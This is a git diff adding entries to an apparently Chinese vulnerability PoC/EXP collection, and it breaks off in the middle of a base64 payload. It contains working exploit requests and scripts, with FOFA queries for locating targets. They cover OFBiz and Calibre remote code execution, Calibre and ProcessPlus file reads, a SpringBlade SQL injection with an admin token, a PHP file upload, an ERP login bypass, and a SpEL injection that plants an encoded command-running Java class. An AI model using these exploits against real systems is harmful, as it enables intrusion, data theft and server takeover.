diff --git a/Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856).md b/Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856).md new file mode 100644 index 0000000..9f7bc57 --- /dev/null +++ b/Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856).md @@ -0,0 +1,24 @@ +# Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856) + +2024年8月,互联网上披露了Apache OFBiz 授权不当致代码执行漏洞(CVE-2024-38856),该漏洞允许未经身份验证的远程攻击者通过特定的URL绕过安全检测机制执行恶意代码。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。Apache OFBiz <= 18.12.14 + +## fofa + +```yaml +app="Apache_OFBiz" +``` + +## poc + +```java +POST /webtools/control/main/ProgramExport HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Type: application/x-www-form-urlencoded + +groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b +``` + +![效果图](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062344609.png) + diff --git a/Calibre任意文件读取漏洞(CVE-2024-6781).md b/Calibre任意文件读取漏洞(CVE-2024-6781).md new file mode 100644 index 0000000..4a84a0c --- /dev/null +++ b/Calibre任意文件读取漏洞(CVE-2024-6781).md @@ -0,0 +1,34 @@ +# Calibre任意文件读取漏洞(CVE-2024-6781) + +Calibre <= 7.14.0 中的路径遍历允许未经身份验证的攻击者实现任意文件读取。 + +## poc + +```python +#! /usr/bin/env python3 +# Ldwk +# PoC for: CVE-2024-6781 +import json +import sys + +import requests + +_target = "http://localhost:8080" # SET ME +_book_id = 1 # ensure book_id exists + +def exploit(path): + r = requests.post( + f"{_target}/cdb/cmd/export", + headers={"Content-Type": "application/json"}, + json=["extra_file", _book_id, path, ""], + ) + try: + print(r.json()["result"]) + except Exception: + print(r.text) + +if __name__ == "__main__": + exploit("..\\..\\..\\Calibre Settings\\gui.json") + +``` + diff --git a/Calibre远程代码执行漏洞(CVE-2024-6782).md b/Calibre远程代码执行漏洞(CVE-2024-6782).md new file mode 100644 index 0000000..db1a76f --- /dev/null +++ b/Calibre远程代码执行漏洞(CVE-2024-6782).md @@ -0,0 +1,46 @@ +# Calibre远程代码执行漏洞(CVE-2024-6782) + +Calibre 6.9.0 ~ 7.14.0 中不当的访问控制允许未经身份验证的攻击者实现远程代码执行。 + +## poc + +```python +#! /usr/bin/env python3 +# PoC for: CVE-2024-6782 +# Description: Unauthenticated remote code execution in 6.9.0 <= calibre <= 7.14.0 +import json +import sys + +import requests + +_target = "http://localhost:8080" + +def exploit(cmd): + r = requests.post( + f"{_target}/cdb/cmd/list", + headers={"Content-Type": "application/json"}, + json=[ + ["template"], + "", # sortby: leave empty + "", # ascending: leave empty + "", # search_text: leave empty, set to all + 1, # limit results + f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '{cmd}']).decode()", # payload + ], + ) + + try: + print(list(r.json()["result"]["data"]["template"].values())[0]) + except Exception as e: + print(r.text) + +if __name__ == "__main__": + exploit("whami") +``` + +![8d4237fcfec48246cfa4fb6fe3e48327_CVE-2024-6782_01 calibre-rce](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408072136806.gif) + +## 漏洞来源 + +- https://github.com/zangjiahe/CVE-2024-6782 +- https://mp.weixin.qq.com/s/JlH43FVTgzV0O4m8jII3ug \ No newline at end of file diff --git a/PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911).md b/PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911).md new file mode 100644 index 0000000..df064d7 --- /dev/null +++ b/PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911).md @@ -0,0 +1,20 @@ +# PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911) + +由于 PerkinElmer ProcessPlus 中包含本地文件,因此无需对外部方进行身份验证即可访问 Windows 系统上的文件。此问题影响 ProcessPlus:到 1.11.6507.0。 + + + +## poc + +```java +GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Content-Ldwk: YmllY2hhb2xlc2I= +Accept-Encoding: gzip, deflate, br +Connection: close +Upgrade-Insecure-Requests: 1 + +``` + diff --git a/README.md b/README.md index 6a02d8a..4b3772e 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,23 @@ # 漏洞收集 收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了900多个poc/exp,善用CTRL+F搜索 +## 2024.08.07 新增漏洞 + +- 蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181) +- 世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281) +- 泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞 +- Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856) +- 易捷OA协同办公软件ShowPic接口存在任意文件读取 +- SpringBlade系统usual接口存在SQL注入漏洞 +- 宏景eHR系统ajaxService接口处存在SQL注入漏洞 +- 满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞 +- 蓝凌EKP系统dataxml.tmpl存在命令执行漏洞 +- 云时空社会化商业ERP系统online存在身份认证绕过漏洞 +- PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911) +- 赛蓝企业管理系统GetCssFile存在任意文件读取漏洞 +- Calibre任意文件读取漏洞(CVE-2024-6781) +- Calibre远程代码执行漏洞(CVE-2024-6782) + ## 2024.08.04 新增漏洞 - 同享人力管理管理平台UploadHandler存在任意文件上传漏洞 diff --git a/SpringBlade系统usual接口存在SQL注入漏洞.md b/SpringBlade系统usual接口存在SQL注入漏洞.md new file mode 100644 index 0000000..8eb1cce --- /dev/null +++ b/SpringBlade系统usual接口存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# SpringBlade系统usual接口存在SQL注入漏洞 + +BladeX企业级开发平台 usual/list 存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml +body="https://bladex.vip" +``` + +## poc + +```yaml +GET /api/blade-log/usual/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Connection: close +``` + +![效果图](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062349399.png) \ No newline at end of file diff --git a/世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281).md b/世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281).md new file mode 100644 index 0000000..d0b18ac --- /dev/null +++ b/世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281).md @@ -0,0 +1,38 @@ +# 世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281) + +盛邦通信的SPON IP对讲广播系统采用先进的IPAudio技术,通过局域网和广域网以数据包的形式传输音频信号。该系统实现了全数字化的传输。盛邦通信的SPON IP对讲广播系统存在一个漏洞,允许任意文件上传。攻击者可以利用这个漏洞上传任意文件,并获取服务器权限。 + +## fofa + +```yaml +icon_hash="-1830859634" +``` + +## poc + +```yaml +POST /php/addmediadata.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) +AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 +Content-Length: 514 +Content-Type: multipart/form-data;boundary=de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f08 +Accept-Encoding: gzip, deflate, br +Connection: close + +--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828 +Content-Disposition: form-data; name="fullpath" + +../ +--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828 +Content-Disposition: form-data; name="subpath" + +/ +--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828 +Content-Disposition: form-data; name="file"; filename="test.php" +Content-Type: application/octet-stream + + +--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828-- +``` + diff --git a/云时空社会化商业ERP系统online存在身份认证绕过漏洞.md b/云时空社会化商业ERP系统online存在身份认证绕过漏洞.md new file mode 100644 index 0000000..9e94186 --- /dev/null +++ b/云时空社会化商业ERP系统online存在身份认证绕过漏洞.md @@ -0,0 +1,22 @@ +# 云时空社会化商业ERP系统online存在身份认证绕过漏洞 + +## fofa + +```java +app="云时空社会化商业ERP系统" +``` + +## poc + +获取sessionid值,替换emscm.session.id,刷新页面即可登录后台 + +```java +GET /sys/user/online HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close +``` + diff --git a/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md b/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md index a028e29..ae75fb2 100644 --- a/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md +++ b/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md @@ -13,13 +13,15 @@ app="契约锁-电子签署平台" ```java POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1 Host: -User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like -Gecko) Chrome/113.0.0.0 Safari/537.36 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/json - -{"id":"2","params":[{"expression":"var a=new -org.springframework.expression.spel.standard.SpelExpressionParser();var b='SpEL 表达式的 base64 编 -码';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF- -8');var c=a.parseExpression(deStr);c.getValue();"}]} +Connection: close +X-State: id + +{"id":"2","params":[{"expression":"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='VCAob3JnLnNwcmluZ2ZyYW1ld29yay5jZ2xpYi5jb3JlLlJlZmxlY3RVdGlscykuZGVmaW5lQ2xhc3MoIlF5c1Rlc3QiLFQgKG9yZy5zcHJpbmdmcmFtZXdvcmsudXRpbC5CYXNlNjRVdGlscykuIGRlY29kZUZyb21TdHJpbmcoInl2NjZ2Z0FBQURJQktBb0FJUUNXQ0FDWENnQ1lBSmtLQUpnQW1nb0Ftd0NjQ0FDZENnQ2JBSjRIQUo4SUFLQUlBS0VJQUtJSUFLTUtBQjhBcEFvQXBRQ21DQUNuQ2dDWUFLZ0tBS1VBcVFjQWd3b0FtQUNxQ0FDckNnQXNBS3dLQUNFQXJRb0FId0NxQ0FDdUNnQWZBSzhLQUxBQXFnZ0FzUW9BTEFDeUNBQ3pDQUMwQndDMUNnQWZBTFlIQUxjS0FMZ0F1UWdBdWdjQXV3Z0F2QWdBdlFjQXZnb0FKd0MvQ2dBbkFNQUtBQ2NBd1FnQXdnY0F3d2dBeEFnQXhRa0F4Z0RIQ2dER0FNZ0lBTWtIQU1vSUFNc0lBTXdJQU0wS0FNNEF6d29BTEFEUUNBRFJDQURTQ0FEVENBRFVDQURWQndEV0NnRFhBTmdLQU5jQTJRb0EyZ0RiQ2dBOUFOd0lBTjBLQUQwQTNnb0FQUURmQndEZ0NnQkZBSllJQU9FS0FDd0E0Z29BUlFEakNBRGtDQURsQndEbUNnQk1BT2NJQU9nSEFPa0JBQVk4YVc1cGRENEJBQU1vS1ZZQkFBUkRiMlJsQVFBUFRHbHVaVTUxYldKbGNsUmhZbXhsQVFBU1RHOWpZV3hXWVhKcFlXSnNaVlJoWW14bEFRQUVkR2hwY3dFQUNVeFJlWE5VWlhOME93RUFDR1J2U1c1cVpXTjBBUUFVS0NsTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBVjJZWEl5T0FFQUlreHFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmpzQkFBVjJZWEl5TmdFQUdVeHFZWFpoTDJ4aGJtY3ZjbVZtYkdWamRDOUdhV1ZzWkRzQkFBVjJZWEl5TndFQUlVeHFZWFpoTDJ4aGJtY3ZUbTlUZFdOb1RXVjBhRzlrUlhoalpYQjBhVzl1T3dFQUJYWmhjak14QVFBRmRtRnlNeklCQUJKTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFBVjJZWEl6TXdFQUJYSmxjRzl1QVFBRGMzUnlBUUFTVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3QVFBRVkyMWtjd0VBRTF0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBbHlaWE4xYkhSVGRISUJBQVpsYm1OdlpHVUJBQVYyWVhJek1BRUFCWFpoY2pJNUFRQUJTUUVBQlhaaGNqSXhBUUFGZG1GeU1qSUJBQVYyWVhJeU13RUFCWFpoY2pJMEFRQUZkbUZ5TWpVQkFBVjJZWEkzT0FFQUZVeHFZWFpoTDNWMGFXd3ZRWEp5WVhsTWFYTjBPd0VBQlhaaGNqSXdBUUFGZG1GeU1Ua0JBQkpNYW1GMllTOXNZVzVuTDFSb2NtVmhaRHNCQUFWMllYSXhPQUVBQkhaaGNqZ0JBQVIyWVhJNUFRQVhUR3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2pzQkFBVjJZWEl4TUFFQUVVeHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0FRQUZkbUZ5TVRFQkFBVjJZWEl4TWdFQUJYWmhjakV6QVFBRmRtRnlNVFFCQUFWMllYSXhOUUVBQlhaaGNqRTJBUUFUVzB4cVlYWmhMMnhoYm1jdlZHaHlaV0ZrT3dFQUJYWmhjakUzQVFBQldnRUFGVXhxWVhaaEwyeGhibWN2UlhoalpYQjBhVzl1T3dFQUEyMXpad0VBRFZOMFlXTnJUV0Z3VkdGaWJHVUhBTU1IQU9vSEFPc0hBSjhIQUxVSEFPd0hBTGNIQUxzSEFMNEhBR2NIQU9ZQkFBcFRiM1Z5WTJWR2FXeGxBUUFNVVhselZHVnpkQzVxWVhaaERBQlFBRkVCQUFWemRHRnlkQWNBNmd3QTdRRHVEQUR2QVBBSEFPc01BUEVBOEFFQUhXOXlaeTVoY0dGamFHVXVZMjk1YjNSbExsSmxjWFZsYzNSSmJtWnZEQUR5QVBNQkFDQnFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmdFQUVHcGhkbUV1YkdGdVp5NVVhSEpsWVdRQkFCVnFZWFpoTG14aGJtY3VWR2h5WldGa1IzSnZkWEFCQUNKdmNtY3VZWEJoWTJobExtTnZlVzkwWlM1U1pYRjFaWE4wUjNKdmRYQkpibVp2QVFBSGRHaHlaV0ZrY3d3QTlBRDFCd0RzREFEMkFQY0JBQVowWVhKblpYUU1BUGdBK1F3QStnRDdEQUQ4QUZnQkFBUm9kSFJ3REFEOUFQNE1BUDhCQUFFQUNVVnVaSEJ2YVc1MEpBd0JBUUVDQndFREFRQWFiM0puTG1Gd1lXTm9aUzUwYjIxallYUXVkWFJwYkM1dVpYUU1BUVFCQlFFQUJuUm9hWE1rTUFFQUNtZGxkRWhoYm1Sc1pYSUJBQTlxWVhaaEwyeGhibWN2UTJ4aGMzTU1BUVlCQndFQUVHcGhkbUV2YkdGdVp5OVBZbXBsWTNRSEFRZ01BUWtCQ2dFQUNXZGxkRWRzYjJKaGJBRUFIMnBoZG1FdmJHRnVaeTlPYjFOMVkyaE5aWFJvYjJSRmVHTmxjSFJwYjI0QkFBWm5iRzlpWVd3QkFBcHdjbTlqWlhOemIzSnpBUUFUYW1GMllTOTFkR2xzTDBGeWNtRjVUR2x6ZEF3QkN3RU1EQUVOQVE0TUFQb0JEd0VBRTJkbGRGZHZjbXRsY2xSb2NtVmhaRTVoYldVQkFCQnFZWFpoTDJ4aGJtY3ZVM1J5YVc1bkFRQURjbVZ4QVFBSFoyVjBUbTkwWlFjQkVBd0JFUUI4REFFU0FSTUJBQXRuWlhSU1pYTndiMjV6WlFFQUVsdE1hbUYyWVM5c1lXNW5MME5zWVhOek93RUFDV2RsZEVobFlXUmxjZ0VBQjFndFUzUmhkR1VCQUFkdmN5NXVZVzFsQndFVURBRVZBUllNQVJjQVdBRUFCbmRwYm1SdmR3RUFCMk50WkM1bGVHVUJBQUl2WXdFQUJ5OWlhVzR2YzJnQkFBSXRZd0VBRVdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5QndFWURBRVpBUm9NQVJzQkhBY0JIUXdCSGdFZkRBQlFBU0FCQUFKY1FRd0JJUUVpREFFakFGZ0JBQlp6ZFc0dmJXbHpZeTlDUVZORk5qUkZibU52WkdWeUFRQUZWVlJHTFRnTUFTUUJKUXdBYVFFbUFRQUpZV1JrU0dWaFpHVnlBUUFIYzNWalkyVnpjd0VBRTJwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0TUFTY0FVUUVBQldWeWNtOXlBUUFIVVhselZHVnpkQUVBRUdwaGRtRXZiR0Z1Wnk5VWFISmxZV1FCQUJWcVlYWmhMMnhoYm1jdlEyeGhjM05NYjJGa1pYSUJBQmRxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlHYVdWc1pBRUFEV04xY25KbGJuUlVhSEpsWVdRQkFCUW9LVXhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd0VBRldkbGRFTnZiblJsZUhSRGJHRnpjMHh2WVdSbGNnRUFHU2dwVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjMHh2WVdSbGNqc0JBQWxuWlhSUVlYSmxiblFCQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3dFQURYTmxkRUZqWTJWemMybGliR1VCQUFRb1dpbFdBUUFPWjJWMFZHaHlaV0ZrUjNKdmRYQUJBQmtvS1V4cVlYWmhMMnhoYm1jdlZHaHlaV0ZrUjNKdmRYQTdBUUFEWjJWMEFRQW1LRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPeWxNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNCQUFkblpYUk9ZVzFsQVFBSVkyOXVkR0ZwYm5NQkFCc29UR3BoZG1FdmJHRnVaeTlEYUdGeVUyVnhkV1Z1WTJVN0tWb0JBQWhuWlhSRGJHRnpjd0VBRXlncFRHcGhkbUV2YkdGdVp5OURiR0Z6Y3pzQkFBcG5aWFJRWVdOcllXZGxBUUFWS0NsTWFtRjJZUzlzWVc1bkwxQmhZMnRoWjJVN0FRQVJhbUYyWVM5c1lXNW5MMUJoWTJ0aFoyVUJBQVpsY1hWaGJITUJBQlVvVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3S1ZvQkFBbG5aWFJOWlhSb2IyUUJBRUFvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3VzB4cVlYWmhMMnhoYm1jdlEyeGhjM003S1V4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5TlpYUm9iMlE3QVFBWWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrQVFBR2FXNTJiMnRsQVFBNUtFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME8xdE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdBUUFGWTJ4dmJtVUJBQlFvS1V4cVlYWmhMMnhoYm1jdlQySnFaV04wT3dFQUJITnBlbVVCQUFNb0tVa0JBQlVvU1NsTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFCRnFZWFpoTDJ4aGJtY3ZTVzUwWldkbGNnRUFCRlJaVUVVQkFBZDJZV3gxWlU5bUFRQVdLRWtwVEdwaGRtRXZiR0Z1Wnk5SmJuUmxaMlZ5T3dFQUVHcGhkbUV2YkdGdVp5OVRlWE4wWlcwQkFBdG5aWFJRY205d1pYSjBlUUVBSmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUxkRzlNYjNkbGNrTmhjMlVCQUJGcVlYWmhMMnhoYm1jdlVuVnVkR2x0WlFFQUNtZGxkRkoxYm5ScGJXVUJBQlVvS1V4cVlYWmhMMnhoYm1jdlVuVnVkR2x0WlRzQkFBUmxlR1ZqQVFBb0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUJHNWxlSFFCQUFoblpYUkNlWFJsY3dFQUZpaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BXMElCQUJZb1cwSXBUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFQY0hKcGJuUlRkR0ZqYTFSeVlXTmxBQ0VBVHdBaEFBQUFBQUFDQUFFQVVBQlJBQUVBVWdBQUFDOEFBUUFCQUFBQUJTcTNBQUd4QUFBQUFnQlRBQUFBQmdBQkFBQUFDUUJVQUFBQURBQUJBQUFBQlFCVkFGWUFBQUFKQUZjQVdBQUJBRklBQUFjaUFBWUFJQUFBQXVrU0FrdTRBQU5NSzdZQUJMWUFCVTBzRWdhMkFBZFhwd0FKVGl1MkFBUk5MQklKdGdBSFRpd1NDcllBQnpvRUxCSUd0Z0FIT2dVc0VndTJBQWM2QmhrRUVneTJBQTA2QnhrSEJMWUFEaTBTRDdZQURUb0lHUWdFdGdBT0dRY3J0Z0FRdGdBUndBQVN3QUFTd0FBU3dBQVNPZ2tETmdvRE5nc1ZDeGtKdnFJQ1hCa0pGUXN5T2d3WkRNWUNTaGtNdGdBVEVoUzJBQldaQWowWkNCa010Z0FST2cwWkRjWUNMeGtOdGdBV3RnQVhFaGkyQUJXWkFoOFpEYllBRnJZQUdiWUFHaElidGdBY21RSU1HUTIyQUJZU0hiWUFEVG9PR1E0RXRnQU9HUTRaRGJZQUVUb1BHUSsyQUJZU0hnTzlBQisyQUNBWkR3TzlBQ0cyQUNJNkVBRTZFUmtRdGdBV0VpTUR2UUFmdGdBZ0dSQUR2UUFodGdBaU9oR25BQ0E2RWhrUXRnQVdFaVcyQUEwNkV4a1RCTFlBRGhrVEdSQzJBQkU2RVJrR0VpYTJBQTA2RWhrU0JMWUFEaGtTR1JHMkFCSEFBQ2M2RXhrVHRnQW93QUFuT2hRRE5oVVZGUmtVdGdBcG9nRmlHUlFWRmJZQUtqb1dHUmJHQVU0WkJSSXJBNzBBSDdZQUlCa1dBNzBBSWJZQUlzQUFMRG9YR1JmR0FUQVpGN2dBQTdZQUU3WUFISmtCSWhrRkVpMjJBQTA2R0JrWUJMWUFEaGtZR1JhMkFCRTZHUmtadGdBV0VpNEV2UUFmV1FPeUFDOVR0Z0FnR1JrRXZRQWhXUU1FdUFBd1U3WUFJam9hR1JxMkFCWVNNUU85QUIvQUFESzJBQ0FaR2dPOUFDRzJBQ0k2R3hrWnRnQVdFak1FdlFBZldRTVRBQ3hUdGdBZ0dSa0V2UUFoV1FNU05GTzJBQ0xBQUN3NkhCSTF1QUEydGdBM0VqaTJBQldaQUJrR3ZRQXNXUU1TT1ZOWkJCSTZVMWtGR1J4VHB3QVdCcjBBTEZrREVqdFRXUVFTUEZOWkJSa2NVem9kdXdBOVdiZ0FQaGtkdGdBL3RnQkF0d0JCRWtLMkFFTzJBRVE2SHJzQVJWbTNBRVlaSGhKSHRnQkl0Z0JKT2g4Wkc3WUFGaEpLQmIwQUgxa0RFd0FzVTFrRUV3QXNVN1lBSUJrYkJiMEFJVmtERWpSVFdRUVpIbE8yQUNKWEJEWUtwd0FKaEJVQnAvNmFGUXFaQUFhbkFBbUVDd0duL2FJU1MwdW5BQXRNSzdZQVRSSk9TeXF3QUFNQUR3QVdBQmtBQ0FFQkFSb0JIUUFrQUFNQzNBTGZBRXdBQXdCVEFBQUJBZ0JBQUFBQUN3QURBQTRBQndBUEFBOEFFZ0FXQUJVQUdRQVRBQm9BRkFBZkFCY0FKZ0FZQUM0QUdRQTJBQm9BUGdBYkFFY0FIQUJOQUIwQVZRQWVBRnNBSHdCeUFDQUFkUUFpQUlBQUl3Q0hBQ1FBbVFBbEFLSUFKZ0RLQUNjQTFnQW9BTndBS1FEbEFDb0EvZ0FyQVFFQUxnRWFBRE1CSFFBdkFSOEFNQUVyQURFQk1RQXlBVG9BTlFGREFEWUJTUUEzQVZVQU9BRmZBRG9CYkFBN0FYVUFQQUY2QUQwQmt3QStBYVlBUHdHdkFFQUJ0UUJCQWI0QVFnSGtBRU1DQUFCRkFpY0FTQUppQUVrQ2ZnQktBcEVBU3dLL0FFd0N3Z0JOQXNVQU9nTExBRklDMEFCVEF0TUFJZ0xaQUcwQzNBQnhBdDhBYmdMZ0FHOEM1QUJ3QXVjQWN3QlVBQUFCYWdBa0FCb0FCUUJaQUZvQUF3RXJBQThBV3dCY0FCTUJId0FiQUYwQVhnQVNBYThCRmdCZkFGd0FHQUcrQVFjQVlBQmhBQmtCNUFEaEFHSUFZUUFhQWdBQXhRQmpBR0VBR3dJbkFKNEFaQUJsQUJ3Q1lnQmpBR1lBWndBZEFuNEFSd0JvQUdVQUhnS1JBRFFBYVFCbEFCOEJrd0V5QUdvQVpRQVhBWFVCVUFCckFHRUFGZ0ZpQVdrQVdRQnNBQlVBMWdIOUFHMEFYQUFPQU9VQjdnQnVBR0VBRHdEK0FkVUFid0JoQUJBQkFRSFNBSEFBWVFBUkFVTUJrQUJ4QUZ3QUVnRlZBWDRBY2dCekFCTUJYd0YwQUYwQWN3QVVBS0lDTVFCMEFHRUFEUUNIQWt3QWRRQjJBQXdBZUFKaEFIY0FiQUFMQUFjQzFRQjRBSFlBQVFBUEFzMEFlUUI2QUFJQUpnSzJBSHNBZkFBREFDNENyZ0I5QUh3QUJBQTJBcVlBZmdCOEFBVUFQZ0tlQUg4QWZBQUdBRWNDbFFDQUFGd0FCd0JWQW9jQWdRQmNBQWdBY2dKcUFJSUFnd0FKQUhVQ1p3Q0VBSVVBQ2dMZ0FBY0Fld0NHQUFFQUF3TG1BSWNBWlFBQUFJZ0FBQUdYQUE3L0FCa0FBd2NBaVFjQWlnY0Fpd0FCQndDTUJmOEFXQUFNQndDSkJ3Q0tCd0NMQndDTkJ3Q05Cd0NOQndDTkJ3Q09Cd0NPQndBU0FRRUFBUDhBcEFBU0J